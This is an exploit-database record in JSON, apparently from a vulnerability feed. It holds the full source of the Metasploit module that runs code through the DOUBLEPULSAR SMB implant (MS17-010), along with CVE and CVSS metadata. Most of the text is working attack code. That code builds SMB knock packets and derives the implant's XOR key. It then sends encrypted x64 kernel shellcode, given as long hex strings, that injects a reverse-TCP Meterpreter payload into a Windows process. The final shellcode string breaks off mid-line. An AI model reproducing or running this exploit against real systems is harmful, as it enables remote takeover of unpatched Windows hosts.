\"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" +\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" +\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" +\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" +\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" +\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" +\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" +\n \"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" +\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" +\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" +\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" +\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" +\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" +\n 
\"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" +\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" +\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" +\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" +\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" +\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" +\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" +\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" +\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" +\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\n end\n\n def kernel_shellcode_size\n make_kernel_shellcode('').length\n end\n\nend\n", "_object_type": "robots.models.zdt.ZDTBulletin", "_object_types": ["robots.models.zdt.ZDTBulletin", "robots.models.base.Bulletin"]}, {"id": "1337DAY-ID-33895", "vendorId": null, "hash": "90b8d0833fc6be46c6824f7750ed36c5", "type": "zdt", "bulletinFamily": "exploit", "title": "SMB DOUBLEPULSAR Remote Code Execution Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. 
While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2020-02-04T00:00:00", "modified": "2020-02-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33895", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0148", "CVE-2017-0143", "CVE-2017-0147", "CVE-2017-0144"], "immutableFields": [], "lastseen": "2021-11-14T11:47:36", "history": [{"bulletin": {"id": "1337DAY-ID-33895", "vendorId": null, "hash": "1f2509ca21849136bc9b87bc7e0d7ed6", "type": "zdt", "bulletinFamily": "exploit", "title": "SMB DOUBLEPULSAR Remote Code Execution Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. 
While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2020-02-04T00:00:00", "modified": "2020-02-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/33895", "reporter": "metasploit", "references": [], "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "immutableFields": [], "lastseen": "2020-02-05T00:47:44", "history": [], "viewCount": 110, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41891", "EDB-ID:41987", "EDB-ID:43970", "EDB-ID:42031"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:146236"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", 
"RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"]}, {"type": "zdt", "idList": ["1337DAY-ID-27786", "1337DAY-ID-33313", "1337DAY-ID-27613", "1337DAY-ID-27803", "1337DAY-ID-27802", "1337DAY-ID-29702", "1337DAY-ID-27752"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL", "SMB_DOUBLE_PULSAR_BACKDOOR_DETECT.NBIN", "700099.PRM", "700059.PRM"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0148", "CVE-2017-0145", "CVE-2017-0144", "CVE-2017-0143"]}, {"type": "symantec", "idList": ["SMNTC-96709", "SMNTC-96705", "SMNTC-96707", "SMNTC-96704", "SMNTC-96706", "SMNTC-96703"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104"]}, {"type": "threatpost", "idList": ["THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7"]}, {"type": "mmpc", "idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:89789F73D15A0B331512F90F7E692851"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:F12E2167FDA829ED32C7A16A83B048BF", 
"THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0144", "MS:CVE-2017-0145", "MS:CVE-2017-0143"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "avleonov", "idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2"]}], "modified": "2020-02-05T00:47:44", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2020-02-05T00:47:44", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33895", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n include Msf::Module::Deprecated\r\n\r\n moved_from 'exploit/windows/smb/doublepulsar_rce'\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'SMB DOUBLEPULSAR Remote Code Execution',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow 
Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14', # Shadow Brokers leak\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload (x64)',\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n }\r\n ],\r\n ['Neutralize implant',\r\n 'DefaultOptions' => {\r\n 'PAYLOAD' => nil # XXX: \"Unset\" generic payload\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_OS_DOWN],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n 
OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }.freeze\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }.freeze\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack1('V')\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n print_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n print_warning(\"#{msg} - Arch: 
#{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n print_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n print_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload (x64)'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when 
:alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n 
@multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack('S<')\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" \\\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" \\\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" \\\r\n 
\"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" \\\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" \\\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" \\\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" \\\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" \\\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" \\\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" \\\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" \\\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" \\\r\n \"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" \\\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" \\\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" \\\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" \\\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" \\\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" \\\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" \\\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" \\\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" \\\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" \\\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" \\\r\n 
\"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" \\\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" \\\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" \\\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" \\\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" \\\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" \\\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" \\\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" \\\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" \\\r\n \"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" \\\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" \\\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" \\\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" \\\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" \\\r\n 